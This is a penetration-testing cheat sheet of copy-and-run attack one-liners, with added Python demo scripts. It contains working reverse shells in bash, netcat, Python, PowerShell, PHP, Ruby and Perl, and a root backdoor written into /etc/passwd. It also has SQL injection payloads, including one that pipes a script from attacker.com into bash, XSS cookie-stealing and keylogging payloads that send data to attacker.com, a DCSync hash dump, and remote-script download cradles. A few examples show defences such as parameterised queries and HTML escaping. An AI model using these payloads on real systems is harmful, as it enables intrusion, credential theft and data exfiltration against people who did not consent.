📋 Cheat Sheets

Quick reference for common attacks and techniques. Copy, modify, execute. Updated for 2025.

Reverse Shells Linux

Bash Reverse Shell

Standard bash reverse shell using the /dev/tcp pseudo-device. This is a bash feature, not a kernel one, so it fails under sh/dash; start a listener on 10.0.0.1:4444 before running it.

bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
Tags: bash, linux, initial-access
Reverse Shells Linux

Netcat Reverse Shell

Classic netcat reverse shell. Requires a netcat build with -e (ncat or nc.traditional); the OpenBSD netcat shipped by default on Debian/Ubuntu has no -e, so use the mkfifo variant below there.

nc -e /bin/bash 10.0.0.1 4444
Tags: netcat, linux, shell
Reverse Shells Linux

Netcat Reverse Shell (No -e)

Netcat reverse shell without -e flag using named pipes

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.0.1 4444 >/tmp/f
Tags: netcat, linux, mkfifo
Reverse Shells Linux

Python Reverse Shell

Python reverse shell that connects back, points fds 0/1/2 at the socket with dup2 and spawns bash under a PTY. Many current systems ship only python3; swap the interpreter name if python is not on PATH.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Tags: python, linux, pty
Reverse Shells Windows

PowerShell Reverse Shell

PowerShell TCP reverse shell

$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Tags: powershell, windows, tcp
Reverse Shells Linux

PHP Reverse Shell

PHP one-liner reverse shell. It assumes the socket lands on file descriptor 3, which holds for php -r on the CLI because fds 0-2 are already open; when run through a web shell the descriptor number can differ, so verify it rather than relying on 3.

php -r '$sock=fsockopen("10.0.0.1",4444);exec("/bin/bash -i <&3 >&3 2>&3");'
Tags: php, linux, web
Reverse Shells Linux

Ruby Reverse Shell

Ruby one-liner reverse shell

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Tags: ruby, linux, shell
Reverse Shells Linux

Perl Reverse Shell

Perl reverse shell one-liner

perl -e 'use Socket;$i="10.0.0.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Tags: perl, linux, socket
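Added example (mine, not part of the cheat sheet): the Python reverse shell from this section in function form, plus the listener side the one-liners all assume, wired together as a loopback round trip so the mechanism can be exercised without a second host. The loopback address, the ephemeral port, /bin/sh as the shell and the commands sent are assumptions for the demo.

```python
import socket
import subprocess
import threading


def reverse_shell(host, port, shell="/bin/sh"):
    """Victim side. Connect back and hand the socket to a shell as its stdin/stdout/stderr.

    Same trick as the python one-liner above (connect, then make fds 0/1/2 point at the
    socket), done through Popen so this demo process keeps its own terminal instead of
    dup2()-ing over it. Returns the shell's exit status.
    """
    s = socket.create_connection((host, port))
    proc = subprocess.Popen([shell], stdin=s, stdout=s, stderr=s)
    rc = proc.wait()
    s.close()
    return rc


def start_listener(host="127.0.0.1", port=0):
    """Attacker side, the role `nc -lvnp PORT` plays. port=0 lets the kernel pick a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv


def drive_shell(conn, commands, timeout=10):
    """Write commands into the connected shell and return everything it sends back.

    The read loop ends when the shell exits (recv returns b"") or after `timeout` seconds
    of silence, so a shell that never exits cannot hang the handler.
    """
    conn.settimeout(timeout)
    conn.sendall(commands.encode())
    out = b""
    try:
        while True:
            chunk = conn.recv(4096)
            if not chunk:
                break
            out += chunk
    except socket.timeout:
        pass
    finally:
        conn.close()
    return out.decode(errors="replace")


def run_demo():
    """Loopback round trip: listener and reverse shell in one process; returns the shell output."""
    srv = start_listener()
    port = srv.getsockname()[1]
    victim = threading.Thread(target=reverse_shell, args=("127.0.0.1", port), daemon=True)
    victim.start()
    conn, _peer = srv.accept()
    # 'exit' makes the remote shell terminate, which closes the socket and ends drive_shell's loop
    output = drive_shell(conn, "echo shell-ok uid=$(id -u); exit 0\n")
    victim.join(timeout=10)
    srv.close()
    return output


if __name__ == "__main__":
    print(run_demo(), end="")
```

A shell obtained this way has no TTY (no job control, Ctrl-C kills the connection). Upgrade it with the pty.spawn trick from the Python entry above, then on the attacker side press Ctrl-Z, run stty raw -echo; fg, and reset the terminal.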
Linux Privilege Escalation Linux

SUID Binary Search

Find all SUID binaries; check each hit against GTFOBins for a known escalation. Errors from unreadable directories are discarded.

find / -perm -4000 -type f 2>/dev/null
Tags: linux, privesc, suid
Linux Privilege Escalation Linux

Writable /etc/passwd

Append a second uid 0 user if /etc/passwd is writable, then switch to it (the password is password123). The hash must be generated inside double quotes: in single quotes $(...) is not expanded and the literal text lands in the file.

echo "root2:$(openssl passwd -1 -salt hack password123):0:0:root:/root:/bin/bash" >> /etc/passwd && su root2
Tags: linux, privesc, passwd
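Added example (mine, not part of the cheat sheet) covering the SUID search and the writable-file check above in one script: a filesystem walk that reports setuid/setgid files the way the find command does (unreadable directories skipped, symlinks not followed), and an os.access check for the sensitive files an attacker hopes to find writable. The demo tree it scans is constructed in a temporary directory; the list of sensitive paths is an assumption.

```python
import os
import stat
import tempfile


def find_setid_binaries(root):
    """Sorted (path, mode) for every regular file under root with the SUID or SGID bit set.

    Same result as `find ROOT \\( -perm -4000 -o -perm -2000 \\) -type f 2>/dev/null`:
    directories that cannot be read are skipped (onerror), symlinks are not followed (lstat).
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _err: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable, the cases 2>/dev/null hides
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, stat.filemode(st.st_mode)))
    return sorted(hits)


def setid_by_name(root):
    """Convenience view of find_setid_binaries: {basename: mode string}."""
    return {os.path.basename(p): m for p, m in find_setid_binaries(root)}


# Assumed list of files worth testing for write access (the /etc/passwd trick above needs the first).
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "/etc/sudoers", "/etc/crontab")


def writable_sensitive_files(paths=SENSITIVE_FILES):
    """Subset of paths the current euid can write; os.access honours mode bits and ACLs."""
    return [p for p in paths if os.path.isfile(p) and os.access(p, os.W_OK)]


def build_demo_tree():
    """Constructed sample tree: one SUID file, one SGID file, one plain file. Returns its root."""
    root = tempfile.mkdtemp(prefix="setid-demo-")
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    for name, mode in (("su", 0o4755), ("wall", 0o2755), ("cat", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    for path, mode in find_setid_binaries(build_demo_tree()):
        print(mode, path)
    print("writable:", writable_sensitive_files())
```

Point find_setid_binaries at "/" on a real host; expect it to take a while and to return a few dozen entries on a stock distribution, most of which are benign.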
Linux Privilege Escalation Linux

Sudo Version Check

Check the sudo version for CVE-2021-3156 (Baron Samedit, affecting 1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1) and other known sudo bugs. Distributions backport fixes without changing the version string, so treat a match as a lead, not proof.

sudo -V | grep 'Sudo version'
Tags: linux, privesc, sudo, cve
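Added example (mine, not the cheat sheet's): parse the `sudo -V` output and compare it against the Baron Samedit ranges quoted above. The point worth seeing in code is the version ordering: sudo's pN patch level sorts after the bare release, so 1.8.31 < 1.8.31p2 < 1.8.32, and a naive string comparison gets that wrong. The ranges are the ones published for CVE-2021-3156; the sample version strings are constructed.

```python
import re
import subprocess

# Affected ranges from the CVE-2021-3156 (Baron Samedit) advisory, inclusive at both ends:
# legacy 1.8.2 .. 1.8.31p2 and stable 1.9.0 .. 1.9.5p1.
BARON_SAMEDIT_RANGES = (
    ((1, 8, 2, 0), (1, 8, 31, 2)),
    ((1, 9, 0, 0), (1, 9, 5, 1)),
)

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_sudo_version(text):
    """'Sudo version 1.8.31p2' (or just '1.8.31p2') -> (1, 8, 31, 2).

    The trailing pN is sudo's patch level and sorts after the bare release, so
    1.8.31 < 1.8.31p1 < 1.8.31p2 < 1.8.32, which plain tuple comparison gives us.
    """
    m = _VERSION_RE.search(text)
    if not m:
        raise ValueError("no sudo version in %r" % text)
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def in_baron_samedit_range(version):
    """version may be a tuple from parse_sudo_version() or a raw `sudo -V` line."""
    v = parse_sudo_version(version) if isinstance(version, str) else tuple(version)
    return any(lo <= v <= hi for lo, hi in BARON_SAMEDIT_RANGES)


def local_sudo_version():
    """Run `sudo -V` (needs no privileges) and return the parsed version, or None if sudo is absent."""
    try:
        out = subprocess.run(["sudo", "-V"], capture_output=True, text=True, timeout=10).stdout
    except (OSError, subprocess.TimeoutExpired):
        return None
    for line in out.splitlines():
        if line.startswith("Sudo version"):
            return parse_sudo_version(line)
    return None


if __name__ == "__main__":
    v = local_sudo_version()
    print("sudo", v, "in Baron Samedit range:", v is not None and in_baron_samedit_range(v))
```

Because of distro backports, confirm a version hit with the non-destructive test from the advisory: run sudoedit -s / as an unprivileged user; a vulnerable build answers "sudoedit: /: not a regular file", a patched build prints its usage text.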
Linux Privilege Escalation Linux

Capabilities Enumeration

Find files with special capabilities set

getcap -r / 2>/dev/null
Tags: linux, privesc, capabilities
Linux Privilege Escalation Linux

Cron Job Enumeration

Enumerate system and user cron jobs for writable scripts, relative paths or PATH abuse. Chain with ; rather than &&: crontab -l exits non-zero when the user has no crontab and would otherwise stop the chain early. sudo -n fails immediately instead of hanging on a password prompt in a shell without a TTY.

cat /etc/crontab; ls -la /etc/cron.*; crontab -l; sudo -n crontab -l
Tags: linux, privesc, cron
Linux Privilege Escalation Linux

Kernel Version Check

Check kernel version for known exploits

uname -a && cat /proc/version && cat /etc/issue
Tags: linux, privesc, kernel
Linux Privilege Escalation Linux

LinPEAS Quick Scan

Fetch and run the LinPEAS automated privilege escalation scanner in one step. It is loud on disk and on the network; where EDR is present, download it, review it and run it from a writable directory instead of piping it straight into a shell.

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Tags: linux, privesc, automation
Windows Privilege Escalation Windows

Check User Privileges

Display current user privileges and tokens

whoami /priv
Tags: windows, privesc, whoami
Windows Privilege Escalation Windows

Unquoted Service Path Search

Find auto-start services whose binary path is unquoted and outside C:\Windows. A hit is only exploitable if the path contains spaces and you can write to one of the directories along it (check with icacls). wmic is deprecated and missing from recent Windows 11 builds; Get-CimInstance Win32_Service exposes the same fields.

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows" | findstr /i /v """"
Tags: windows, privesc, services
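Added example (mine, not from the cheat sheet): the detection logic behind the wmic pipeline above, run over a constructed sample of service output. It separates the binary path from its arguments, flags unquoted paths that contain spaces, and lists the intermediate paths Windows tries first (the places where a planted binary would run as the service). The sample output, service names and paths are constructed; whether the directories are writable still has to be checked on the host.

```python
import re

# Constructed sample in the layout `wmic service get name,pathname,displayname,startmode` prints.
SAMPLE_WMIC_OUTPUT = r"""
DisplayName               Name          PathName                                                    StartMode
Windows Update            wuauserv      C:\Windows\system32\svchost.exe -k netsvcs                  Auto
Backup Agent              BackupAgent   C:\Program Files\Backup Tools\agent service\agent.exe       Auto
Safe Agent                SafeAgent     "C:\Program Files\Safe Agent\agent.exe" -service            Auto
Old Monitor               OldMon        C:\Tools\monitor.exe                                        Manual
"""

# A quoted path, or an unquoted one running up to the first .exe (spaces allowed in between).
PATHNAME_RE = re.compile(r'"[A-Za-z]:\\[^"]+"|[A-Za-z]:\\\S+(?: \S+)*?\.exe', re.IGNORECASE)


def service_binary(pathname):
    """Split a raw PathName into (binary path, was_quoted), dropping any arguments."""
    pathname = pathname.strip()
    if pathname.startswith('"'):
        return pathname[1:pathname.index('"', 1)], True
    m = re.match(r".+?\.exe(?=\s|$)", pathname, re.IGNORECASE)
    return (m.group(0) if m else pathname.split(" ")[0]), False


def hijack_candidates(binary_path):
    r"""The paths Windows tries, in order, before the real binary when the path is unquoted.

    C:\Program Files\Backup Tools\agent service\agent.exe is attempted as C:\Program.exe,
    then C:\Program Files\Backup.exe, then C:\Program Files\Backup Tools\agent.exe.
    A binary dropped at any of these (if its directory is writable) runs with the service's account.
    """
    return [binary_path[:i] + ".exe" for i, ch in enumerate(binary_path) if ch == " "]


def is_unquoted_with_spaces(pathname):
    """The condition the findstr filters approximate: no quotes and at least one space in the path."""
    binary, quoted = service_binary(pathname)
    return not quoted and " " in binary


def scan_wmic_output(text):
    """Return the unquoted, space-containing binary paths found in wmic service output."""
    flagged = []
    for line in text.splitlines():
        m = PATHNAME_RE.search(line)
        if m and is_unquoted_with_spaces(m.group(0)):
            flagged.append(service_binary(m.group(0))[0])
    return flagged


if __name__ == "__main__":
    for path in scan_wmic_output(SAMPLE_WMIC_OUTPUT):
        print(path)
        for candidate in hijack_candidates(path):
            print("  would try:", candidate)
```

Feed it the real output by saving wmic's text to a file and passing its contents to scan_wmic_output; then test each candidate directory for write access before celebrating.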
Windows Privilege Escalation Windows

AlwaysInstallElevated Check

Check whether AlwaysInstallElevated is enabled, which lets any user install an MSI as SYSTEM. Both the HKLM and HKCU values must be 1; reg query fails on a missing key, so the && chain stopping early already rules the technique out.

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated && reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
Tags: windows, privesc, registry
Windows Privilege Escalation Windows

Stored Credentials Search

List stored credentials that can be used with runas

cmdkey /list
Tags: windows, privesc, credentials
Windows Privilege Escalation Windows

PowerUp Privilege Check

Download PowerUp in memory and run all of its Windows privilege escalation checks. Defender and AMSI flag both this download cradle and the script itself, so expect it to be blocked outside a lab.

powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1');Invoke-AllChecks"
Tags: windows, privesc, powershell, automation
Windows Privilege Escalation Windows

Windows Exploit Suggester

Capture the OS build and installed hotfixes for Windows Exploit Suggester; copy systeminfo.txt to your own machine and run the suggester there against it.

systeminfo > systeminfo.txt
Tags: windows, privesc, exploits
SQL Injection Web

Union-Based SQLi Payload

Basic union-based SQL injection payload (adjust column count)

' UNION SELECT NULL,NULL,NULL-- -
Tags: sqli, web, union
SQL Injection Web

Error-Based SQLi (MySQL)

MySQL error-based SQL injection that leaks the version through a duplicate-key error. RAND(0) is seeded so the GROUP BY collision is deterministic; with unseeded RAND() the error only fires some of the time.

' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)y)-- -
Tags: sqli, mysql, error-based
SQL Injection Web

Boolean-Based Blind SQLi

Boolean-based blind SQL injection true condition

' AND 1=1-- -
Tags: sqli, blind, boolean
SQL Injection Web

Time-Based Blind SQLi (MySQL)

Time-based blind SQL injection using SLEEP

' AND SLEEP(5)-- -
Tags: sqli, mysql, time-based
SQL Injection Web

SQLi Authentication Bypass

Classic SQL injection authentication bypass in the username field: the OR makes the WHERE clause true for every row and the comment discards the password check, so the application logs in as whichever user is returned first.

admin' OR '1'='1'-- -
Tags: sqli, auth-bypass, login
SQL Injection Web

PostgreSQL RCE via SQLi

PostgreSQL command execution via COPY ... TO PROGRAM, which runs the command as the postgres OS user. Needs an injection point that allows stacked queries, a connection running as superuser (or a role granted pg_execute_server_program), and outbound access from the database host.

'; COPY (SELECT '') TO PROGRAM 'curl http://attacker.com/shell.sh | bash'-- -
Tags: sqli, postgresql, rce
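Added example (mine, not from the cheat sheet) that runs the union, boolean and authentication-bypass payloads from this section against an in-memory SQLite database, with the string-built query beside its parameterised fix. The schema, rows and credentials are constructed. SQLite accepts the same -- comment syntax, but the SLEEP() and COPY payloads above are MySQL- and PostgreSQL-specific and are not reproduced here.

```python
import sqlite3


def make_db():
    """Constructed sample schema and rows; in-memory SQLite stands in for the target's database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        INSERT INTO users (username, password, role) VALUES
            ('admin', 'S3cret!Adm1n', 'admin'),
            ('alice', 'alicepw', 'user');
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        INSERT INTO products (name, price) VALUES ('widget', 9.5), ('gadget', 19.0);
    """)
    return db


def login_vulnerable(db, username, password):
    """String-built query: the input becomes part of the SQL, so a quote breaks out of the literal."""
    sql = ("SELECT username, role FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return db.execute(sql).fetchone()


def login_safe(db, username, password):
    """Parameterised query: the same payload is compared as data and never parsed as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()


def search_vulnerable(db, name):
    """Injectable product search used for the UNION and boolean probes below."""
    return db.execute("SELECT name, price FROM products WHERE name = '%s'" % name).fetchall()


def find_column_count(db, max_cols=10):
    """UNION SELECT NULL,NULL,... probing: the first column count that does not error is the answer."""
    for n in range(1, max_cols + 1):
        payload = "' UNION SELECT " + ",".join(["NULL"] * n) + "-- -"
        try:
            search_vulnerable(db, payload)
            return n
        except sqlite3.OperationalError:
            continue  # column count mismatch, try one more
    return None


def boolean_probe(db, condition):
    """Boolean-based blind: does 'widget' AND <condition> still return the row?"""
    return len(search_vulnerable(db, "widget' AND %s-- -" % condition)) > 0


def union_dump_users(db):
    """With the column count (2) known, pull another table's data through the same query."""
    return search_vulnerable(db, "' UNION SELECT username, password FROM users-- -")


if __name__ == "__main__":
    db = make_db()
    print("bypass:", login_vulnerable(db, "admin' OR '1'='1'-- -", "wrong"))
    print("safe:  ", login_safe(db, "admin' OR '1'='1'-- -", "wrong"))
    print("columns:", find_column_count(db))
    print("users:", union_dump_users(db))
```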
XSS Web

Basic XSS Alert

Basic XSS payload for testing

<script>alert(document.domain)</script>
Tags: xss, web, javascript
XSS Web

XSS Cookie Stealer

Exfiltrate cookies via XSS. document.cookie contains semicolons and spaces, so URL-encode it or the request is mangled; cookies flagged HttpOnly are not readable this way at all, and a CSP connect-src can block the request.

<script>fetch('https://attacker.com/?c='+encodeURIComponent(document.cookie))</script>
Tags: xss, cookies, exfiltration
XSS Web

XSS Keylogger

Simple keylogger via XSS. keydown (rather than the deprecated keypress) also sees non-printing keys, and the key name is URL-encoded. One request per keystroke is easy to spot; batch keys before sending on a real engagement.

<script>document.onkeydown=function(e){fetch('https://attacker.com/?k='+encodeURIComponent(e.key))}</script>
Tags: xss, keylogger, web
XSS Web

XSS with SVG

XSS using SVG tag with onload event

<svg onload=alert(1)>
Tags: xss, svg, bypass
XSS Web

XSS IMG Tag

XSS via img tag error event

<img src=x onerror=alert(1)>
Tags: xss, img, onerror
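Added example (mine, not from the cheat sheet): the server side of the XSS section. A template that reflects input into an HTML text node and an attribute is shown beside its escaped form, the page's payloads are pushed through both, and a tokenizer check reports whether any foreign tag or on* handler reached the markup. It also shows why html.escape is the wrong tool inside a script block. The template and the attribute-breakout payload are constructed.

```python
import html
import json
from html.parser import HTMLParser

# The page's payloads plus one attribute-context breakout (constructed).
XSS_PAYLOADS = [
    "<script>alert(document.domain)</script>",
    "<svg onload=alert(1)>",
    "<img src=x onerror=alert(1)>",
    '" autofocus onfocus=alert(1) x="',
]

TEMPLATE = '<p>Hello %s</p><input name="q" value="%s">'


def render_vulnerable(user_input):
    """Reflects input straight into an HTML text context and a quoted attribute context."""
    return TEMPLATE % (user_input, user_input)


def render_escaped(user_input):
    """html.escape(quote=True) neutralises <, >, & and both quote characters, enough for both contexts."""
    safe = html.escape(user_input, quote=True)
    return TEMPLATE % (safe, safe)


def render_js_context(user_input):
    """Inside <script>, HTML escaping is the wrong tool: emit a JS string literal via json.dumps
    and split '</' so the payload cannot close the script element early."""
    literal = json.dumps(user_input).replace("</", "<\\/")
    return "<script>var user = %s;</script>" % literal


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup):
    """What a browser-like tokenizer sees: a list of (tag, attributes)."""
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


def is_injected(markup, allowed=("p", "input")):
    """True if a tag outside the template, or any on* event handler attribute, made it into the DOM."""
    for tag, attrs in parse_tags(markup):
        if tag not in allowed or any(a.lower().startswith("on") for a in attrs):
            return True
    return False


if __name__ == "__main__":
    for payload in XSS_PAYLOADS:
        print("vulnerable:", is_injected(render_vulnerable(payload)),
              "escaped:", is_injected(render_escaped(payload)), payload)
```

URL and CSS contexts need their own encoders again; the rule is one encoder per output context, chosen by where the value lands, not one global escape.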
Password Cracking Linux

Hashcat MD5 Crack

Crack MD5 hashes with rockyou wordlist

hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
Tags: hashcat, md5, passwords
Password Cracking Linux

Hashcat NTLM Crack

Crack NTLM hashes (Windows passwords)

hashcat -m 1000 -a 0 ntlm.txt /usr/share/wordlists/rockyou.txt
Tags: hashcat, ntlm, windows
Password Cracking Linux

John the Ripper Basic

Basic John the Ripper password cracking

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Tags: john, passwords, cracking
Password Cracking Linux

John ZIP Password

Crack ZIP file password

zip2john file.zip > hash.txt && john hash.txt
Tags: john, zip, passwords
Password Cracking Linux

Hashcat Rule-Based Attack

Rule-based password cracking with best64 rules

hashcat -m 0 -a 0 hash.txt wordlist.txt -r /usr/share/hashcat/rules/best64.rule
Tags: hashcat, rules, passwords
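Added example (mine, not from the cheat sheet): what the hashcat -a 0 commands above do, written out in a few dozen lines so the rule mechanism is visible. Each wordlist entry is pushed through a set of mangling rules (a handful in the spirit of best64, with the hashcat rule syntax noted in comments), hashed with MD5 (mode 0) and compared against every target at once. The wordlist and target hashes are constructed; NTLM (mode 1000) is MD4 over the UTF-16LE password and is left out because hashlib's MD4 depends on the OpenSSL legacy provider.

```python
import hashlib

# Constructed stand-in for rockyou.txt.
WORDLIST = ["123456", "letmein", "password", "qwerty", "summer"]


# A few rules in the spirit of best64.rule; the equivalent hashcat rule string is in the comment.
def rule_identity(w):
    return w                                   # :


def rule_capitalize(w):
    return w[:1].upper() + w[1:]               # c


def rule_append_123(w):
    return w + "123"                           # $1 $2 $3


def rule_append_year(w):
    return w + "2024"                          # $2 $0 $2 $4


def rule_reverse(w):
    return w[::-1]                             # r


def rule_leet(w):
    return w.replace("a", "@").replace("o", "0").replace("e", "3")   # sa@ so0 se3


RULES = [rule_identity, rule_capitalize, rule_append_123, rule_append_year, rule_reverse, rule_leet]


def md5_hex(text):
    """hashcat -m 0: raw MD5 of the candidate."""
    return hashlib.md5(text.encode()).hexdigest()


def crack(target_hashes, wordlist=WORDLIST, rules=RULES, hash_fn=md5_hex):
    """Dictionary + rule attack. Returns {hash: plaintext} for every target recovered.

    All targets are kept in one set so each candidate costs a single hash no matter how
    many hashes are loaded, which is why unsalted fast hashes crack in bulk so cheaply.
    """
    remaining = {h.lower() for h in target_hashes}
    found = {}
    for word in wordlist:
        for rule in rules:
            candidate = rule(word)
            digest = hash_fn(candidate)
            if digest in remaining:
                found[digest] = candidate
                remaining.discard(digest)
                if not remaining:
                    return found
    return found


if __name__ == "__main__":
    targets = [md5_hex("password123"), md5_hex("Qwerty"), md5_hex("p@ssw0rd"), md5_hex("uncrackable-zz")]
    for digest, plain in crack(targets).items():
        print(digest, plain)
```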
File Transfer Linux

Python HTTP Server

Quick HTTP server for file transfers

python3 -m http.server 8000
Tags: python, http, transfer
File Transfer Linux

Download with cURL

Download file using cURL

curl http://10.0.0.1:8000/file.txt -o file.txt
Tags: curl, download, http
File Transfer Linux

Download with Wget

Download file using wget

wget http://10.0.0.1:8000/file.txt
Tags: wget, download, http
File Transfer Windows

PowerShell Download

Download file using PowerShell

powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.0.0.1:8000/file.exe','file.exe')"
Tags: powershell, download, windows
File Transfer Windows

Certutil Download

Download file using certutil (built-in Windows tool)

certutil -urlcache -f http://10.0.0.1:8000/file.exe file.exe
Tags: certutil, download, windows
File Transfer Linux

Base64 File Transfer

Encode a file as a single base64 line for copy/paste transfer over a shell with no network path; decode on the other side and compare checksums, since terminals truncate or wrap long pastes.

base64 -w 0 file.txt
Tags: base64, encoding, transfer
File Transfer Linux

Netcat File Transfer (Sender)

Serve a file via netcat: run this on the host that has the file; it listens and feeds the file on stdin to whoever connects.

nc -lvnp 4444 < file.txt
Tags: netcat, transfer, sender
File Transfer Linux

Netcat File Transfer (Receiver)

Receive a file via netcat: connect to the serving host and write everything that arrives to disk. Some netcat builds do not exit when the file ends, so Ctrl-C once the size stops growing and compare checksums on both ends.

nc 10.0.0.1 4444 > file.txt
Tags: netcat, transfer, receiver
Port Scanning Linux

Nmap TCP SYN Scan

Fast TCP SYN scan of all 65535 ports. -sS needs raw sockets (root or CAP_NET_RAW); without them nmap refuses to run it, so drop -sS to fall back to a connect scan. -T4 is quick but can lose results on lossy links.

nmap -sS -p- -T4 10.0.0.1
Tags: nmap, scanning, tcp
Port Scanning Linux

Nmap Service Version Detection

Service version detection with default scripts

nmap -sV -sC -p- 10.0.0.1
Tags: nmap, services, scripts
Port Scanning Linux

Nmap UDP Scan

UDP scan of top 100 ports

nmap -sU --top-ports 100 10.0.0.1
Tags: nmap, udp, scanning
Port Scanning Linux

Nmap Stealth Scan

Evasion-oriented SYN scan: -f splits probes into small IP fragments and -D mixes in ten random decoy source addresses. Both need raw sockets (root), fragmentation is reassembled by most modern IDS anyway, and decoys only help when the real source cannot be singled out by other means.

nmap -sS -f -D RND:10 10.0.0.1
Tags: nmap, stealth, evasion
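Added example (mine, not from the cheat sheet): a TCP connect scanner that does what nmap -sT does, the unprivileged fallback mentioned above, and maps the three outcomes of a connect() onto nmap's open/closed/filtered states. The demo opens a listener on a random loopback port and scans a window around it, so it runs with no root and no network. Hosts, ports and timeouts are assumptions.

```python
import socket
from concurrent.futures import ThreadPoolExecutor


def tcp_connect(host, port, timeout=0.5):
    """One TCP connect probe, the same thing `nmap -sT` does: a full three-way handshake.

    No raw sockets and no root needed, unlike -sS. The outcomes map to nmap's states:
    connect succeeded -> open, RST -> closed, no answer before the timeout -> filtered.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "closed"
    except (socket.timeout, OSError):
        return "filtered"
    finally:
        s.close()


def scan(host, ports, workers=64, timeout=0.5):
    """Probe ports concurrently; returns {port: state}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda p: (p, tcp_connect(host, p, timeout)), ports))
    return dict(states)


def open_ports(host, ports, **kw):
    return sorted(p for p, state in scan(host, ports, **kw).items() if state == "open")


def demo():
    """Open a listener on a random loopback port, scan a window around it, report the hit."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]
    try:
        found = open_ports("127.0.0.1", range(max(1, port - 5), min(65535, port + 5) + 1))
    finally:
        srv.close()
    return port, found


def closed_port_state():
    """Grab a free port, release it, probe it: the kernel answers with RST, i.e. 'closed'."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return tcp_connect("127.0.0.1", port)


if __name__ == "__main__":
    listening_on, found = demo()
    print("listener on", listening_on, "-> open ports seen:", found)
```

A connect scan completes the handshake, so every probe shows up in the target's application logs; that, not speed, is the practical reason to reach for -sS when you have root.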
Active Directory Windows

Kerberoasting

Kerberoast service accounts (PowerView)

Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat
Tags: ad, kerberos, kerberoasting
Active Directory Windows

AS-REP Roasting

Find users with pre-auth not required for AS-REP roasting

Get-DomainUser -PreauthNotRequired | Select samaccountname
Tags: ad, kerberos, asrep
Active Directory Windows

BloodHound Data Collection

Collect AD data for BloodHound analysis

SharpHound.exe -c All --outputdirectory C:\temp
Tags: ad, bloodhound, enumeration
Active Directory Windows

DCSync Attack

Dump password hashes via DCSync

mimikatz # lsadump::dcsync /domain:example.com /user:Administrator
Tags: ad, mimikatz, dcsync
Active Directory Windows

Domain Enumeration

Enumerate domain trusts

nltest /domain_trusts /all_trusts
Tags: ad, enumeration, trusts
Cloud - AWS Cloud

AWS S3 Bucket List

List contents of public S3 bucket

aws s3 ls s3://bucket-name --no-sign-request
Tags: aws, s3, cloud
Cloud - AWS Cloud

AWS IAM User Enumeration

List IAM users in AWS account

aws iam list-users
